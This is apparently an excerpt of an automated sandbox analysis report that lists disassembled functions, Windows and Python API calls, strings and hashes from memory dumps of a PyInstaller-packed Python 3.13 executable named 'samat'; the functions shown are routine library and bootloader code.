Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 4531F622B08A4142E721BB25BC113ABA699BF88B98F814137EF4D93759DF7CD516C311

Function 00007FF8B7E871F0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 67stringCOMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E8721E
PyUnicode_AsUTF8.PYTHON313 ref: 00007FF8B7E8723C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B7E87251
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8729C

Strings

can't delete SECURITY_ATTRIBUTES attributes, xrefs: 00007FF8B7E87214
The object is not a PySECURITY_DESCRIPTOR object, xrefs: 00007FF8B7E8727B
SECURITY_DESCRIPTOR, xrefs: 00007FF8B7E87247

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DeallocErr_StringUnicode_strcmp
String ID: SECURITY_DESCRIPTOR$The object is not a PySECURITY_DESCRIPTOR object$can't delete SECURITY_ATTRIBUTES attributes
API String ID: 2499284733-1426751177
Opcode ID: 67049ca7dcf50a80a15f7371c299508b5eda7be6bbffd79b9bab495011e33978
Instruction ID: b60db15500475baa252b203e5730a1a281401ce6c09589768d16c60dd2ebbb17
Opcode Fuzzy Hash: 67049ca7dcf50a80a15f7371c299508b5eda7be6bbffd79b9bab495011e33978
Instruction Fuzzy Hash: 1921F962A18B4282FA548BAEE84017D63A0FF49FC4F884131EB5E57BB5DF3CE4918700

Function 00007FF8B7E82310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PyTuple_New.PYTHON313 ref: 00007FF8B7E82358
PyArg_ParseTupleAndKeywords.PYTHON313 ref: 00007FF8B7E82396
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E823AC
PyErr_SetString.PYTHON313 ref: 00007FF8B7E823CC
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E823F2

Strings

EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}, xrefs: 00007FF8B7E823C2
lllO, xrefs: 00007FF8B7E82384

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Dealloc$Arg_Err_KeywordsParseStringTupleTuple_
String ID: EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}$lllO
API String ID: 959004690-1584370844
Opcode ID: 40621dbdd1e1618c9ed3fe52cc1117dbd46a93d7919a77fe4b0fca76490f5cd3
Instruction ID: a6573e93bd1893852a07cb13e5d07a102cd21ba71f46f2dfefff037937fd2721
Opcode Fuzzy Hash: 40621dbdd1e1618c9ed3fe52cc1117dbd46a93d7919a77fe4b0fca76490f5cd3
Instruction Fuzzy Hash: B0314972A08B8682EB049F59E45026D73A4FF94BC4F444236EB8D02B66EF7CE694C704

Function 00007FF8B7E86460 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

PyLong_AsLongLong.PYTHON313 ref: 00007FF8B7E86485
PyErr_Occurred.PYTHON313 ref: 00007FF8B7E86494
PyErr_WarnEx.PYTHON313 ref: 00007FF8B7E864E3
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E864FD
PyErr_SetString.PYTHON313 ref: 00007FF8B7E86518

Strings

Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead, xrefs: 00007FF8B7E864D1
LARGE_INTEGER must be 'int', or '(int, int)', xrefs: 00007FF8B7E8650E

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Long$Arg_Long_OccurredParseStringTupleWarn
String ID: LARGE_INTEGER must be 'int', or '(int, int)'$Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead
API String ID: 3944559157-3919795897
Opcode ID: 28b8025bfafdb96d4bfd2a0ca2c1a4757072f5f8cd4f8e2994eeed24b2e5cec3
Instruction ID: da1c1239428e64e1216e7cb438aee96106e3ff90c9a9a978177de5c568af83b4
Opcode Fuzzy Hash: 28b8025bfafdb96d4bfd2a0ca2c1a4757072f5f8cd4f8e2994eeed24b2e5cec3
Instruction Fuzzy Hash: 7021F922B09B4281EB508B9EF48016D6360FF88BD8F885135EBAE83769DE3CD4958700

Function 00007FF8B7E85A60 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E85AC8

Part of subcall function 00007FF8B7E8CEB0: PyNumber_Long.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEC5
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CED3
Part of subcall function 00007FF8B7E8CEB0: PyLong_AsLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEE1
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEF0
Part of subcall function 00007FF8B7E8CEB0: PyErr_Clear.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEFB
Part of subcall function 00007FF8B7E8CEB0: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF04
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF13
Part of subcall function 00007FF8B7E8CEB0: _Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF2C
Part of subcall function 00007FF8B7E8CEB0: PyErr_Format.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF4B

PyErr_SetString.PYTHON313 ref: 00007FF8B7E85B09
RegCloseKey.ADVAPI32 ref: 00007FF8B7E85B1C

Strings

PyHKEY, xrefs: 00007FF8B7E85A88
The object is not a PyHANDLE object, xrefs: 00007FF8B7E85AFF
RegCloseKey, xrefs: 00007FF8B7E85B2D
HANDLE must be a PyHKEY, xrefs: 00007FF8B7E85ABE

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Long$Occurred$Long_String$ClearCloseDeallocFormatNumber_Unsigned
String ID: HANDLE must be a PyHKEY$PyHKEY$RegCloseKey$The object is not a PyHANDLE object
API String ID: 3516211060-2695813183
Opcode ID: 0c5216022337286ed9870b41cdd036d90f6bfea009756c59fba8a0f1fd48fc4d
Instruction ID: 46488c379ef98ef5980709b831fd59aef124e9ee4f0718a1cdd1a6dd30b4418b
Opcode Fuzzy Hash: 0c5216022337286ed9870b41cdd036d90f6bfea009756c59fba8a0f1fd48fc4d
Instruction Fuzzy Hash: D4213022B18B4691EB508B69E4D007D63A1EF84FD4F945072DB0E876B1EE3CE989C700

Function 00007FF8B7E8D400 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

PyBuffer_Release.PYTHON313 ref: 00007FF8B7E8D43A
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8D471
PyObject_GetBuffer.PYTHON313 ref: 00007FF8B7E8D487
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E8D4A2
PyErr_Format.PYTHON313 ref: 00007FF8B7E8D4BC

Strings

Buffer cannot be None, xrefs: 00007FF8B7E8D467
Buffer length can be at most %d characters, xrefs: 00007FF8B7E8D4AF

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Buffer_Err_Release$BufferFormatObject_String
String ID: Buffer cannot be None$Buffer length can be at most %d characters
API String ID: 1670810688-686265896
Opcode ID: b8068afb17dceacaa5a51a8d99800dcb7b56c81bac3d0113414031d6818f4ca7
Instruction ID: 2f06f9a4b78831482447759757e35754a839182eb1b5a2f749420ab60035285c
Opcode Fuzzy Hash: b8068afb17dceacaa5a51a8d99800dcb7b56c81bac3d0113414031d6818f4ca7
Instruction Fuzzy Hash: B6212822A0AB4681EB54CF5EE54423C63A1EF48FD4F584431EB4E476BADF3CE4859350

Function 00007FF8B7E86560 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

PyLong_AsUnsignedLongLong.PYTHON313 ref: 00007FF8B7E8657D
PyErr_Occurred.PYTHON313 ref: 00007FF8B7E8658C
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E865C9
PyErr_SetString.PYTHON313 ref: 00007FF8B7E865E4
PyErr_WarnEx.PYTHON313 ref: 00007FF8B7E86610

Strings

Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead, xrefs: 00007FF8B7E865FE
ULARGE_INTEGER must be 'int', or '(int, int)', xrefs: 00007FF8B7E865DA

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Long$Arg_Long_OccurredParseStringTupleUnsignedWarn
String ID: Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead$ULARGE_INTEGER must be 'int', or '(int, int)'
API String ID: 507489655-1767028231
Opcode ID: 01d08b6a7bdc53fd350f74aed6df4b248a7441d7d16c80b61a1c5fffd659387c
Instruction ID: b99682b6cfb22a551c6b00d68be1822e62ac7a2a386b836a7c4a7017b080666e
Opcode Fuzzy Hash: 01d08b6a7bdc53fd350f74aed6df4b248a7441d7d16c80b61a1c5fffd659387c
Instruction Fuzzy Hash: 04213E62B08B4292EB508B9EF58016D6360FF88FD9F845635EB6E476A9DF3CD494C700

Function 00007FF8B7E84960 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E84982
PyBytes_AsStringAndSize.PYTHON313 ref: 00007FF8B7E849A0
PyErr_Format.PYTHON313 ref: 00007FF8B7E849CC

Strings

Attributes of PyDEVMODEW can't be deleted, xrefs: 00007FF8B7E84978
Length of DriverData cannot be longer that DriverExtra (%d bytes), xrefs: 00007FF8B7E849C2

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_String$Bytes_FormatSize
String ID: Attributes of PyDEVMODEW can't be deleted$Length of DriverData cannot be longer that DriverExtra (%d bytes)
API String ID: 1818008259-1897733207
Opcode ID: a5819ef29f43b57301ff4610e968360216c56eb932ab9b6083dcd6627cabfeef
Instruction ID: 5ca53378551badb8d9a01f96c8195996565b5cf235a949979d61a66b03a99621
Opcode Fuzzy Hash: a5819ef29f43b57301ff4610e968360216c56eb932ab9b6083dcd6627cabfeef
Instruction Fuzzy Hash: 58117062E08B0281EB148B6EE8400BD2361EF89FE0F445231EA2E877B5EF3CD4958300

Function 00007FF8B7E89240 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8925B
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF8B7E8926C
GetSidSubAuthority.ADVAPI32 ref: 00007FF8B7E89282
PyLong_FromLong.PYTHON313 ref: 00007FF8B7E8928A
PyErr_SetString.PYTHON313 ref: 00007FF8B7E892A7

Strings

i:GetSubAuthority, xrefs: 00007FF8B7E89251
The index is out of range, xrefs: 00007FF8B7E8929D

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Authority$Arg_CountErr_FromLongLong_ParseStringTuple
String ID: The index is out of range$i:GetSubAuthority
API String ID: 2376698166-2602025648
Opcode ID: 9792cac582ac62394290b1a74a7f90c0f1413b6a5918cc6ae41e1e619801df51
Instruction ID: 9328fb99f3f1ea7ca17d80bd6c928246c290bf5f06d76739f721d4890ba96add
Opcode Fuzzy Hash: 9792cac582ac62394290b1a74a7f90c0f1413b6a5918cc6ae41e1e619801df51
Instruction Fuzzy Hash: 8EF03C62F0874382EB049BAAE84407D63A1AF89FC5F884431DB1E4B771DE3CE498C700

Function 00007FF8B7E874A0 Relevance: 12.1, APIs: 8, Instructions: 52COMMON

Download Yara Rule

APIs

GetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF8B7E874B8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E874D3
GetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF8B7E874EB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E87506
GetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF8B7E87519
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8752D
GetSecurityDescriptorGroup.ADVAPI32 ref: 00007FF8B7E87540
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E87554

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DescriptorSecurityfree$DaclGroupOwnerSacl
String ID:
API String ID: 1788430091-0
Opcode ID: f80fdbaf805613b61b14d3bdd1e52ccbc5edc22b729c516d134f0c2fd5eeb702
Instruction ID: d4a6b859791a173722b2daaae16ba41a588622b47ed9cd4a68df2b2278eaa5c0
Opcode Fuzzy Hash: f80fdbaf805613b61b14d3bdd1e52ccbc5edc22b729c516d134f0c2fd5eeb702
Instruction Fuzzy Hash: E4212522A09B4291FF458F99E4502BE6770EF85FC0F980432EB4E52974DE3CD448CA00

Function 00007FF7E12CDCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD4D
GetLastError.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD85
FreeLibrary.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDDF3
GetProcAddress.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDDFF

Strings

api-ms-, xrefs: 00007FF7E12CDD6D

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: de88a2c629d611537c078454b295b9c253d13256b400c749d567abecc1f2cb6a
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 8F31C522F1A60692EF12AB029C02775A39CFF48BA4FD94537DE1D56384DFBCE444C261

Function 00007FF8B7E86AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

PyUnicode_AsUTF8.PYTHON313 ref: 00007FF8B7E86AF8

Strings

Internal, xrefs: 00007FF8B7E86B7A
hEvent, xrefs: 00007FF8B7E86B18
InternalHigh, xrefs: 00007FF8B7E86BA7

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Unicode_
String ID: Internal$InternalHigh$hEvent
API String ID: 2646675794-1769053571
Opcode ID: 3230954fda80a3a15b7262756ef6922f42f6b866fcf77cc308d0e9cd2de208ae
Instruction ID: 0fbc83104a5c5051a7c8d9f4766f0305a16d53e0a5f76c8f6395f7e6fa89ad27
Opcode Fuzzy Hash: 3230954fda80a3a15b7262756ef6922f42f6b866fcf77cc308d0e9cd2de208ae
Instruction Fuzzy Hash: 88312B26B19B8281EB558B5AF55007D6760EF88FD8F481031EF5E4776AEE3CE891C704

Function 00007FF8B7E89E90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON313(?,?,?,00007FF8B7E89D82), ref: 00007FF8B7E89EB4
PyErr_Format.PYTHON313(?,?,?,00007FF8B7E89D82), ref: 00007FF8B7E89ED7
PyObject_CallMethod.PYTHON313(?,?,?,00007FF8B7E89D82), ref: 00007FF8B7E89F03
_Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E89D82), ref: 00007FF8B7E89F86

Strings

must be a pywintypes time object (got %s), xrefs: 00007FF8B7E89EC2
astimezone, xrefs: 00007FF8B7E89EF9

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: CallDeallocErr_FormatMethodObject_SubtypeType_
String ID: astimezone$must be a pywintypes time object (got %s)
API String ID: 244768906-1654730096
Opcode ID: 4ebedb747ce80201b9841f6db2a3ad0b1a2b2efc78f376f388bf9c6af551531f
Instruction ID: f107c7c26c019be5c82226abb85fda272eb3c91fbbc4059f7b26cc99ef046704
Opcode Fuzzy Hash: 4ebedb747ce80201b9841f6db2a3ad0b1a2b2efc78f376f388bf9c6af551531f
Instruction Fuzzy Hash: 2031D167A087C286EB588B6AD56017C3BA0EF49BC1B589037DBAE83361EE3CD154C710

Function 00007FF7E12C2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7E12C351A,?,00000000,00007FF7E12C3F23), ref: 00007FF7E12C2AA0

Strings

0, xrefs: 00007FF7E12C2B16
[PYI-%d:%s] , xrefs: 00007FF7E12C2AA8
Warning, xrefs: 00007FF7E12C2B1E
Warning [ANSI Fallback], xrefs: 00007FF7E12C2B0F
WARNING, xrefs: 00007FF7E12C2AAF

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: e87a00a17ac7ee17782615e2d05f2ad3334025735a3d0b5fada15cdec6019ce9
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 86219F32B1878186E721AB55B8427E6A298BB88380F800137FE8D93659DFBCD255C751

Function 00007FF7E12C8570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7E12C8590
OpenProcessToken.ADVAPI32 ref: 00007FF7E12C85A3
GetTokenInformation.ADVAPI32 ref: 00007FF7E12C85C8
GetLastError.KERNEL32 ref: 00007FF7E12C85D2
GetTokenInformation.ADVAPI32 ref: 00007FF7E12C8612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7E12C862E
CloseHandle.KERNEL32 ref: 00007FF7E12C8646

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction ID: 8bc466157fc79f4e4760f11b050d3a7fb52429372c27907ffbf0425d94d04ff1
Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction Fuzzy Hash: AC217331B0C64246EB10AB55F94532AE7A8FF817A0F918237EA6C83AE4DEFDD445C711

Function 00007FF7E12DB150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7E12DB15F
FlsGetValue.KERNEL32 ref: 00007FF7E12DB174
FlsSetValue.KERNEL32 ref: 00007FF7E12DB195
FlsSetValue.KERNEL32 ref: 00007FF7E12DB1C2
FlsSetValue.KERNEL32 ref: 00007FF7E12DB1D3
FlsSetValue.KERNEL32 ref: 00007FF7E12DB1E4
SetLastError.KERNEL32 ref: 00007FF7E12DB1FF

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
